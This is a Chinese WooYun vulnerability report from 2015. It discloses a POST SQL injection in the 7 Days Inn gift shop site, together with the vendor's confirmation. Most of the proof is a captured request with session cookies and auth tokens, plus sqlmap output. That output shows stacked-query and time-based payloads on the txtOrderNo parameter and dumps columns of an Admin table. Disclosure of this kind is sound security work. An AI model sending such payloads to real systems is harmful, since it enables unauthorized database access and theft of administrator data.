当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110941

漏洞标题:7天连锁酒店一个很难过的注入

相关厂商:7天连锁酒店

漏洞作者: 路人甲

提交时间:2015-05-04 15:37

修复时间:2015-06-18 16:00

公开时间:2015-06-18 16:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-04: 厂商已经确认,细节仅向厂商公开
2015-05-14: 细节向核心白帽子及相关领域专家公开
2015-05-24: 细节向普通白帽子公开
2015-06-03: 细节向实习白帽子公开
2015-06-18: 细节向公众公开

简要描述:

一个很难过的注入

详细说明:

一个很难过的注入

漏洞证明:

code>http://mygifts.plateno.com/PersonalCenter/MyOrderList.aspx</code>
这里是他的商城,审核注意他的注入是post注入:

POST /PersonalCenter/MyOrderList.aspx HTTP/1.1
Host: mygifts.plateno.com
Proxy-Connection: keep-alive
Content-Length: 1360
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://mygifts.plateno.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://mygifts.plateno.com/PersonalCenter/MyOrderList.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: utag_main=v_id:014cbd87f7ac00235f3fee2e4bf01f065001c05d00876$_sn:1$_ss:0$_pn:2%3Bexp-session$_st:1429110765616$ses_id:1429108946860%3Bexp-session; bkng=11UmFuZG9tSVYkc2RlIyh9YWJdm48m5cJDWuLLIYaigN4h6aMhDfebFAqaoHzvpqNNoh%2BYtJvK5BkSZZhc7fq019lkUxgRJHU3ugt%2FSlOlBzwLB8JK1RXYh1OOmqUu1J3E5ID%2FOyDp%2Br%2BXDHGSSsxnXiCW%2FtMkD%2BsCyQ8q0YWEa9j3GxeUyihfg2TuI3NMuPRczR%2BPJumPvuk%3D; user=103137794%7C5; loginStatus=2015%2F04%2F28%2001%3A00%3A18%7Ctrue; Hm_lvt_39cd07a8ec3f1a319296c92d8a2f25c8=1430197102,1430197167,1430197199,1430199215; Hm_lpvt_39cd07a8ec3f1a319296c92d8a2f25c8=1430199404; ASP.NET_SessionId=canjwr55dxivbqfb21rdtoyv; CheckCode=660F; s_cc=true; svid=BDB8E2029D61E5DA; s_sq=plateno-prd%3D%2526pid%253Dmygifts.plateno.com%25252FDefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmygifts.plateno.com%25252FLogin.aspx%2526ot%253DA; url=/PersonalCenter/MyOrderList.aspx; .ASPXAUTH=6FDD224E42B399990B3F65E9C006CD85F166EA0AAB3D0AD3AC485485ABB567727025FC062E57F17D94398A0F5F4D9D5A25C955526760DE273FB141D7687099C7534DB34A585B72CDC0ADF7CA7ACA6D2E6DDDCF3FDA6493458FECE475B43C27B8EBC1671BA20244459BBDC70399A25896031562C3; CNZZDATA1253955047=486448934-1428939919-http%253A%252F%252Ffofa.so%252F%7C1430222980
__EVENTTARGET=lbtnSearch&__EVENTARGUMENT=&__VIEWSTATE=soVAJyOHH7hzDL%2BNRpmUPrnCD%2FSNR2KqJkCOTFC%2B2Tlu%2FrS%2FkjWTlA%2BC4HLALZkAkhe%2Bn2I2tKJr2pl0La0gfHoWRaM%2B2xTUcjJTe3ImuinoM6sgV8RWQt0QsOCk%2BJ4mCLRO%2BropVC8YU0ni3Bi77Bi8BIgCrmn2xnxQ7GCpI%2FBmPFcTzbRGqOFljMZlghKKg%2BdMIP101nvUP54XSmAQuorOzh6DR0aE8adu0nN%2B4qBGhjRoM7smHzWjmp6xjZ6r%2BJHv6B3B9TEZSyKjPoF1g5Z8hV8%2FSUg5%2FV%2FuaOqsHLBYuzfEThxwWQHcbdNfTQ0v5HzShhE0HEYit4%2BpktuENZck%2BJ%2Bn0wP4UkuBudNHBdY0L10dxnvdA2Cvgd5Hq53KhixWqZCGkWPqKOuDyQKveVX6TYZSHKtEGb%2F2y6Zs4gFv%2Bkt5rcvIFGpWcF93eI9Ui9%2BZSEHnxhTD3UGh8B9zah5V82dLrsjlzcHmTzY%2B6cQLp4RVCLWInKUZMwkxw2as%2BcNwTy9f3jpdY5lC%2Bw3n6Rv44wAOgWkeF%2B6AlBTvPhm533uy4lpEnxVKPfDYLiYTQsc0I9pSoJUVlhK%2BiNdXTMXgDXXaAjqYX6X%2FRFy0%2BXkv53o3l40CkOSWZh%2BvNEoFMasxGXVam3i6V%2BoXrF8%2B2IOtPYstxGb36hv0Vh9qweLSoSxB%2BnGbfmLoQPJhwqCjdHykn1dWQrUOvCHP9tmId1Kzx7CQtpg%2Bgy9eV9UWfEofDuybyTdz1ciPi%2BnNSsHUCLTDB4Hu4SXOEZzIIkqA8Lgrr0ewnU%2B2u%2FlAEsLiEx6z77oOpMDb6FTGiZD9owFcAWXLcHQOe2Sw8DXxxoUyLAKdbz1iFvp42mRDSAbE5DVw53k17MhCwBtDvI0%2BZebuwzEv7U8x2Cn7X9X08DdVbBZV94k%3D&__EVENTVALIDATION=uCu2e2tjF4nprAv8XEu9DGyJNjfM7vZdzWj0Oo4seZyTh20ypkJF2D3Zol%2F0GYfj3nA1Bn9CaXyUkRRUo4QkEiBBEkR049t8pMEUXIHuNRpFRmp9LN0%2BVUiG1GppQfNvAk%2Bu2j%2FNNlCfon3Olrn7aRK2MZQEQwClQ4FthSMsoM8sejSJyqSQsUxV0gM%3D&txtOrderNo=111&txtGoodsName=54645&txtTime1=2015-04-01&txtTime2=2015-04-09&ddlState=0


注入类型:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: txtOrderNo (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=lbtnSearch&__EVENTARGUMENT=&__VIEWSTATE=7GR6HbtkNjBe9
X/ScMAoWH2ytuTYsmxi1VMl7AT/hSkar2k0vYzzjCbqUdtlAU4Zl71xYE7Xi76XzOVXhfvz06LhJzLrq
uOEgG1ZeCkOXvRsUWlj4BJZWQdtTQwhoqH4M6vM62GDJDtywySLDQVg3FEBq0rcUGZM+jFfy5BJcw8TD
oNjaQ5WqbCUlvN26iwBW9VV56z6YMImXgX1LjbJfcOvmfhxgS+wAWbFizqE2pk6oXHMhp98zaSsfVkXH
71D6nQ/9evyuhIlBXONlQ7BHLmtsEcJ/VbhcVwsfHCfYn45ElWXUlFthXlnWb5HAUrrXPXqx69HPHo7U
761ysqJRtCobh9Vo37F93oxTKDKXzeAsEFo9kATi8TcROdszR9G3q6BQvPkFi/Q9a/bCKviGANDQnxgn
pcVLgDg6C8FM8rmo3Mr7dEO392Gq0fHhHtvI1Wu9TLO2Zwud2oG8hAcLZmXSNcv6L7y/jCfXogLw3ss+
lrpCLenlAGHnecdaFGKLkopvICGirIhVbjffQQ8/1jX6959Penc+q/SSTN9wAiws8VIOvbVQGMhkaK3f
UrVjYMgKIkC2UNHjgQ6jnb0jC5tfZJNpsl3NGBw8OTdUasGwtki9J9u7JIEz2J/vXT8qEKVodS14GNt5
hk2/mx/8bNLW+WzgWk8rd4ZB6ClAu26B3mfZNrXqq6CgZQ8bG86YjAFEdrVJaTk5P54rxJZfeY+SkTG2
6D51K3JxHkIJoNebRRZREtgTy+eENh6gVHvG5MCOPMb0b/e3fjX+9Hkn4tlKkLojNiWMUkh/GoSCxg6V
GaX5NZOCRgDN6h3ZSixKdBouLE8x6zw1R8WttiNyxskAmu6MCeCHx2qfgdCbEB6C0r7Foi4IexREVCD8
NVdtgbQdWn9E4fj/JRK&__EVENTVALIDATION=cnvD41ZFVOnC1hhnLJk0NEaxRpNfGZ0XdKcpqOasrU
BhQMBiZDkiw3ncE9aHM+wx2XeNxCg8OHtWAFnVhGyGAhxYr/QYeIZATGrCMex+sJasIoIS1069vP/7Na
JhABjjM7mJZ9upH2moz6zEW6V/2Ubc2K/805osrkRba05FMupb7a9jsRVfdyqSFf8=&txtOrderNo=11
1'; WAITFOR DELAY '0:0:5'--&txtGoodsName=1&txtTime1=2015-04-08&txtTime2=2015-04-
08&ddlState=0
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=lbtnSearch&__EVENTARGUMENT=&__VIEWSTATE=7GR6HbtkNjBe9
X/ScMAoWH2ytuTYsmxi1VMl7AT/hSkar2k0vYzzjCbqUdtlAU4Zl71xYE7Xi76XzOVXhfvz06LhJzLrq
uOEgG1ZeCkOXvRsUWlj4BJZWQdtTQwhoqH4M6vM62GDJDtywySLDQVg3FEBq0rcUGZM+jFfy5BJcw8TD
oNjaQ5WqbCUlvN26iwBW9VV56z6YMImXgX1LjbJfcOvmfhxgS+wAWbFizqE2pk6oXHMhp98zaSsfVkXH
71D6nQ/9evyuhIlBXONlQ7BHLmtsEcJ/VbhcVwsfHCfYn45ElWXUlFthXlnWb5HAUrrXPXqx69HPHo7U
761ysqJRtCobh9Vo37F93oxTKDKXzeAsEFo9kATi8TcROdszR9G3q6BQvPkFi/Q9a/bCKviGANDQnxgn
pcVLgDg6C8FM8rmo3Mr7dEO392Gq0fHhHtvI1Wu9TLO2Zwud2oG8hAcLZmXSNcv6L7y/jCfXogLw3ss+
lrpCLenlAGHnecdaFGKLkopvICGirIhVbjffQQ8/1jX6959Penc+q/SSTN9wAiws8VIOvbVQGMhkaK3f
UrVjYMgKIkC2UNHjgQ6jnb0jC5tfZJNpsl3NGBw8OTdUasGwtki9J9u7JIEz2J/vXT8qEKVodS14GNt5
hk2/mx/8bNLW+WzgWk8rd4ZB6ClAu26B3mfZNrXqq6CgZQ8bG86YjAFEdrVJaTk5P54rxJZfeY+SkTG2
6D51K3JxHkIJoNebRRZREtgTy+eENh6gVHvG5MCOPMb0b/e3fjX+9Hkn4tlKkLojNiWMUkh/GoSCxg6V
GaX5NZOCRgDN6h3ZSixKdBouLE8x6zw1R8WttiNyxskAmu6MCeCHx2qfgdCbEB6C0r7Foi4IexREVCD8
NVdtgbQdWn9E4fj/JRK&__EVENTVALIDATION=cnvD41ZFVOnC1hhnLJk0NEaxRpNfGZ0XdKcpqOasrU
BhQMBiZDkiw3ncE9aHM+wx2XeNxCg8OHtWAFnVhGyGAhxYr/QYeIZATGrCMex+sJasIoIS1069vP/7Na
JhABjjM7mJZ9upH2moz6zEW6V/2Ubc2K/805osrkRba05FMupb7a9jsRVfdyqSFf8=&txtOrderNo=11
1' WAITFOR DELAY '0:0:5'--&txtGoodsName=1&txtTime1=2015-04-08&txtTime2=2015-04-0
8&ddlState=0
---
[21:34:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[21:34:09] [INFO] fetching columns for table 'Admin' in database 'jfsc'


360截图20150428213315040.jpg

<
然后就是跑表:管理啥的e

360截图20150428213353219.jpg


360截图20150428213416493.jpg


网速差跑了半天还在跑。。。
大家注意吗,如果出现这个:

360截图20150428215207094.jpg


就要重新抓包,他的cookies有时间限制,过多久就要重新登入

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-05-04 15:58

厂商回复:

洞主好厉害,还好这个站是隔离的,不过同时让我们发现了另外一个问题,多谢。

最新状态:

暂无